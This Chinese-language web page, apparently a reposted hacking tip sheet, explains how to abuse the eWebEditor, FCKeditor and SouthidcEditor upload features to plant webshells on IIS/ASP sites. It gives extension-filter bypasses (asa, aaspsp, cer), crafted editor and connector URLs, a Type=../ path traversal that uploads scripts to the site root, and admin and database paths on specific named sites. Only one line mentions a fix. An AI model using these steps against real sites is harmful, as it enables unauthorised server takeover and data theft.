◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。
ewebeditor
ewebeditornet
fckeditor
editor
southidceditor
SouthidcEditor
在拷贝的一份里加入图片类型( asa aaspsp ) 然后点预览
在编辑器里点设计 然后直接上传asa大马.
(原理:因为在iis里 网站的属性里 应用程序配置一项 asa扩展名还是用asp.dll来解析的,asp也是 还有 cer cdx )
在cer cdx asa的被删掉 那么马儿就找不到 映射不过去.
可以在拷贝过后的样式 图片类型里加入 aaspsp 然后在上传 直接就可以上传asp文件
webeditor_system(1) 就可以看到用户名和密码 如果破解不出来
可以用他来利用!(后台找不到的情况下也可以用此方法)
构造 代码: ewebeditor.asp?id=content&style=standard
ewebeditor.asp?id=46&style=standard1
然后就是进入编辑器 上传asa 或者asp的 得到webshell
可以地址栏构造以下代码: javascript:lbtnUpload.click();
(漏洞修补: 可以在iss里直接把upload文件夹的执行权限选择无. )
http://www.test.com/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=FileUpload&Type=Image&CurrentFolder=/
就把文件名字段改成NEWfile 选择文件名可定义
http://www.xhkjit.com/admin/southidceditor/datas/southidceditor.mdb
http://www.xhkjit.com/admin/southidceditor/admin/admin_login.asp
http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
打开这个地址就可以上传任何类型的文件了,马儿上传到的位置是:
http://www.xxx.com/UserFiles/all/1.asa
"Type=all" 这个变量是自己定义的,在这里创建了all这个目录,而且新的目录没有上传文件格式的限制.
比如输入:
http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=monyer&Connector=connectors/asp/connector.asp
所传的文件就到了 http://www.xxx.com/UserFiles/monyer/ 下了
而 如果这样输入:http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser /default/browser.html?Type=../&Connector=connectors/asp/connector.asp
就可以传到网站的根目录下,网站支持什么脚本,传什么脚本的马就可以了.
http://www.b-horse.cn/newEbiz1/EbizPortalFG/portal/html/BBSThreadMessageMaint.html?forumID=46&threadID=457&messageID=532&ListType=FromForum&FromCurrentPage=1&time=1219282232781
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。